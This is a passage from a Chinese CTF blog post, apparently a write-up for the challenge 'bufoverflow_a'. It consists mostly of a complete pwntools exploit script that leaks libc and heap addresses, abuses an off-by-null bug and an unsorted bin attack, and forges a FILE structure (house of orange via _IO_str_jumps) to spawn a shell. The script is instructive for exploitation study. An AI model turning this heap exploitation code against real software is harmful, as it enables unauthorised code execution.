<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf8  </span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *  </span><br><span class="line">  </span><br><span class="line">sh = process(<span class="string">&#x27;./bufoverflow_a&#x27;</span>)  </span><br><span class="line"><span class="comment">#sh = remote(&#x27;111.198.29.45&#x27;,34863)  </span></span><br><span class="line">libc = ELF(<span class="string">&#x27;/lib/x86_64-linux-gnu/libc-2.23.so&#x27;</span>)  </span><br><span class="line"><span class="comment">#libc = ELF(&#x27;./libc.so.6&#x27;)  </span></span><br><span class="line">_IO_list_all_s = libc.symbols[<span class="string">&#x27;_IO_list_all&#x27;</span>]  </span><br><span class="line">malloc_hook_s =  libc.symbols[<span class="string">&#x27;__malloc_hook&#x27;</span>]  </span><br><span class="line">system_s = libc.sym[<span class="string">&#x27;system&#x27;</span>]  </span><br><span class="line">binsh_s = libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>).<span class="built_in">next</span>()  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">create</span>(<span class="params">size</span>):  </span><br><span class="line">   sh.sendlineafter(<span class="string">&#x27;&gt;&gt;&#x27;</span>,<span class="string">&#x27;1&#x27;</span>)  </span><br><span class="line">   sh.sendlineafter(<span class="string">&#x27;Size:&#x27;</span>,<span class="built_in">str</span>(size))  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">index</span>):  </span><br><span class="line">   sh.sendlineafter(<span class="string">&#x27;&gt;&gt;&#x27;</span>,<span class="string">&#x27;2&#x27;</span>)  </span><br><span class="line">   sh.sendlineafter(<span class="string">&#x27;Index:&#x27;</span>,<span class="built_in">str</span>(index))  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">fill</span>(<span class="params">content</span>):  </span><br><span class="line">   sh.sendlineafter(<span class="string">&#x27;&gt;&gt;&#x27;</span>,<span class="string">&#x27;3&#x27;</span>)  </span><br><span class="line">   sh.sendafter(<span class="string">&#x27;Content:&#x27;</span>,content)  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>():  </span><br><span class="line">   sh.sendlineafter(<span class="string">&#x27;&gt;&gt;&#x27;</span>,<span class="string">&#x27;4&#x27;</span>)  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_IO_str_jumps</span>():  </span><br><span class="line">   IO_file_jumps_offset = libc.sym[<span class="string">&#x27;_IO_file_jumps&#x27;</span>]  </span><br><span class="line">   IO_str_underflow_offset = libc.sym[<span class="string">&#x27;_IO_str_underflow&#x27;</span>]  </span><br><span class="line">   <span class="keyword">for</span> ref_offset <span class="keyword">in</span> libc.search(p64(IO_str_underflow_offset)):  </span><br><span class="line">       possible_IO_str_jumps_offset = ref_offset - <span class="number">0x20</span>  </span><br><span class="line">       <span class="keyword">if</span> possible_IO_str_jumps_offset &gt; IO_file_jumps_offset:  </span><br><span class="line">          <span class="built_in">print</span> possible_IO_str_jumps_offset  </span><br><span class="line">          <span class="keyword">return</span> possible_IO_str_jumps_offset  </span><br><span class="line"><span class="comment">#==============泄露libc相关地址============  </span></span><br><span class="line"><span class="comment">#0  </span></span><br><span class="line">create(<span class="number">0x80</span>)  </span><br><span class="line"><span class="comment">#1  </span></span><br><span class="line">create(<span class="number">0x80</span>)  </span><br><span class="line">delete(<span class="number">0</span>)  </span><br><span class="line">delete(<span class="number">1</span>)  </span><br><span class="line"><span class="comment">#0申请回来，此时保留了libc指针  </span></span><br><span class="line">create(<span class="number">0x80</span>)  </span><br><span class="line">show()  </span><br><span class="line">sh.recv(<span class="number">1</span>)  </span><br><span class="line"><span class="comment">#泄露信息  </span></span><br><span class="line">main_arena_xx = u64(sh.recvuntil(<span class="string">&#x27;\n&#x27;</span>,drop = <span class="literal">True</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))  </span><br><span class="line">malloc_hook_addr = (main_arena_xx &amp; <span class="number">0xFFFFFFFFFFFFF000</span>) +  (malloc_hook_s &amp; <span class="number">0XFFF</span>)  </span><br><span class="line">libc_base = malloc_hook_addr - malloc_hook_s  </span><br><span class="line">_IO_list_all_addr = libc_base + _IO_list_all_s  </span><br><span class="line">_IO_str_jumps_addr = libc_base + get_IO_str_jumps()  </span><br><span class="line">system_addr = libc_base + system_s  </span><br><span class="line">binsh_addr = libc_base + binsh_s  </span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;libc_base=&#x27;</span>,<span class="built_in">hex</span>(libc_base)  </span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;_IO_list_all_addr=&#x27;</span>,<span class="built_in">hex</span>(_IO_list_all_addr)  </span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;system_addr=&#x27;</span>,<span class="built_in">hex</span>(system_addr)  </span><br><span class="line"><span class="comment">#===========泄露堆地址====================  </span></span><br><span class="line"><span class="comment">#1  </span></span><br><span class="line">create(<span class="number">0x400</span>) <span class="comment">#large bin范围的堆释放后会有堆地址  </span></span><br><span class="line">create(<span class="number">0x80</span>) <span class="comment">#2  </span></span><br><span class="line"><span class="comment">#将1放入unsorted bin  </span></span><br><span class="line">delete(<span class="number">1</span>)  </span><br><span class="line"><span class="comment">#触发整理unsorted bin，将1放入large bin，从而1里堆有指针  </span></span><br><span class="line">create(<span class="number">0x500</span>) <span class="comment">#1  </span></span><br><span class="line">delete(<span class="number">1</span>)  </span><br><span class="line"><span class="comment">#释放堆2,由于堆2下面是top块，堆2上面的堆1也是free状态，那么就和全部合并到top块里，但里面的指针信息仍然有保留。  </span></span><br><span class="line">delete(<span class="number">2</span>)  </span><br><span class="line"><span class="comment">#此时，堆0下面的堆1是top块，释放0后，堆0也合并到了top块里。  </span></span><br><span class="line">delete(<span class="number">0</span>)  </span><br><span class="line"><span class="comment">#所有bin都合并了，只剩下一个top块  </span></span><br><span class="line"><span class="comment">#错位0x10,使得接下来1的fd位置正好有堆指针  </span></span><br><span class="line">create(<span class="number">0x90</span>) <span class="comment">#0  </span></span><br><span class="line">create(<span class="number">0x80</span>) <span class="comment">#1  </span></span><br><span class="line">show()  </span><br><span class="line">sh.recv(<span class="number">1</span>)  </span><br><span class="line">heap_base = u64(sh.recvuntil(<span class="string">&#x27;\n&#x27;</span>,drop = <span class="literal">True</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>)) - <span class="number">0xB0</span>  </span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;heap_base=&#x27;</span>,<span class="built_in">hex</span>(heap_base)  </span><br><span class="line"><span class="comment">#============================================  </span></span><br><span class="line">delete(<span class="number">0</span>)  </span><br><span class="line">delete(<span class="number">1</span>)  </span><br><span class="line"><span class="comment">#0  </span></span><br><span class="line">create(<span class="number">0x208</span>)  </span><br><span class="line">fake_chunk = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span>  </span><br><span class="line">fake_chunk += p64(<span class="number">0</span>) + p64(<span class="number">0x1E1</span>)  </span><br><span class="line"><span class="comment">#让fd=bk=p绕过检查  </span></span><br><span class="line">fake_chunk += p64(heap_base + <span class="number">0x50</span>)*<span class="number">2</span>  </span><br><span class="line">fake_chunk = fake_chunk.ljust(<span class="number">0x200</span>,<span class="string">&#x27;a&#x27;</span>)  </span><br><span class="line">fake_chunk += p64(<span class="number">0x1E0</span>)  </span><br><span class="line">fill(fake_chunk)  </span><br><span class="line"><span class="comment">#1  </span></span><br><span class="line">create(<span class="number">0x80</span>)  </span><br><span class="line"><span class="comment">#2注意，2必须为0xF0，这样实际为0x100，off by null one后大小仍为0x100，与top chunk相邻，才能合并到top chunk  </span></span><br><span class="line"><span class="comment">#因此不能在2末尾伪造fake_chunk  </span></span><br><span class="line">create(<span class="number">0xF0</span>)  </span><br><span class="line">fill(<span class="string">&#x27;b&#x27;</span>*<span class="number">0xF0</span>)  </span><br><span class="line">  </span><br><span class="line">delete(<span class="number">1</span>)  </span><br><span class="line"><span class="comment">#1  </span></span><br><span class="line">create(<span class="number">0x88</span>)  </span><br><span class="line">fill(<span class="string">&#x27;b&#x27;</span>*<span class="number">0x80</span> + p64(<span class="number">0x270</span>))  </span><br><span class="line"><span class="comment">#合并  </span></span><br><span class="line">delete(<span class="number">2</span>)  </span><br><span class="line"><span class="comment">####注意  </span></span><br><span class="line">create(<span class="number">0x290</span>) <span class="comment">#2  </span></span><br><span class="line"><span class="comment">#重新复原1、2堆的头信息  </span></span><br><span class="line">fill(<span class="string">&#x27;a&#x27;</span>*<span class="number">0x1D0</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x91</span>) + <span class="string">&#x27;a&#x27;</span>*<span class="number">0x80</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>) + <span class="string">&#x27;\n&#x27;</span>)  </span><br><span class="line"><span class="comment">#为了delete后我们的内容不被清空或填充，  </span></span><br><span class="line"><span class="comment">#我们需要把chunk1也给剔除，这样我们后面申请的时候，才不会被mallocopt设置free后的填充物  </span></span><br><span class="line"><span class="comment">#注意顺序！！！  </span></span><br><span class="line">delete(<span class="number">1</span>)  </span><br><span class="line">delete(<span class="number">0</span>)  </span><br><span class="line">  </span><br><span class="line"><span class="comment">#重新从外层的unsorted bin切割一块空间  </span></span><br><span class="line">create(<span class="number">0x290</span>) <span class="comment">#0  </span></span><br><span class="line"><span class="comment">#在fake_chunk里腾出位置伪造填充块，而这个chunk0末尾也要放一个填充块绕过检查  </span></span><br><span class="line"><span class="comment">#也就是总共要伪造三个chunk，总大小要等于这个chunk0的大小，即0x290  </span></span><br><span class="line">fill(<span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x91</span>) + <span class="string">&#x27;a&#x27;</span>*<span class="number">0x80</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x151</span>) + <span class="string">&#x27;\n&#x27;</span>)  </span><br><span class="line">delete(<span class="number">0</span>) <span class="comment">#得到外层unsorted bin  </span></span><br><span class="line">delete(<span class="number">2</span>) <span class="comment">#得到内层unsorted bin  </span></span><br><span class="line">create(<span class="number">0x290</span>)  </span><br><span class="line"><span class="comment">#现在，我们已经可以控制unsorted bin了  </span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span>  </span><br><span class="line"><span class="comment">#house of orange in 2.24  </span></span><br><span class="line">fake_file = p64(<span class="number">0</span>) + p64(<span class="number">0x60</span>)  </span><br><span class="line"><span class="comment">#unsorted bin attack，修改_IO_list_all为main_arena+88  </span></span><br><span class="line">fake_file += p64(<span class="number">0</span>) + p64(_IO_list_all_addr-<span class="number">0x10</span>)  </span><br><span class="line"><span class="comment">#_IO_write_base &lt; _IO_write_ptr  </span></span><br><span class="line">fake_file += p64(<span class="number">0</span>) + p64(<span class="number">1</span>)  </span><br><span class="line"><span class="comment">#_IO_write_end 、IO_buf_base  </span></span><br><span class="line">fake_file += p64(<span class="number">0</span>) + p64(binsh_addr)  </span><br><span class="line">fake_file = fake_file.ljust(<span class="number">0xD8</span>,<span class="string">&#x27;\x00&#x27;</span>)  </span><br><span class="line"><span class="comment">#vtable指针,同时，也作为fake_vtable的__dummy  </span></span><br><span class="line">fake_file += p64(_IO_str_jumps_addr - <span class="number">8</span>)  </span><br><span class="line"><span class="comment">#__dummy2、__finish  </span></span><br><span class="line">fake_file += p64(<span class="number">0</span>) + p64(system_addr)  </span><br><span class="line">payload += fake_file  </span><br><span class="line">payload += <span class="string">&#x27;\n&#x27;</span>  </span><br><span class="line">fill(payload)  </span><br><span class="line"><span class="comment">#getshell  </span></span><br><span class="line">create(<span class="number">0x80</span>)  </span><br><span class="line">  </span><br><span class="line">sh.interactive()  </span><br></pre></td></tr></table></figure>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/unsorted-bin/" rel="tag"># unsorted bin</a>
              <a href="/tags/house-of-orange/" rel="tag"># house of orange</a>
              <a href="/tags/off-by-one/" rel="tag"># off by one</a>
              <a href="/tags/IO-FILE/" rel="tag"># IO FILE</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/02/17/waterdrop/" rel="prev" title="Waterdrop">
      <i class="fa fa-chevron-left"></i> Waterdrop
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/02/19/bufoverflow_b/" rel="next" title="bufoverflow_b">
      bufoverflow_b <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">ha1vk</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">234</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">145</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ha1vk</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
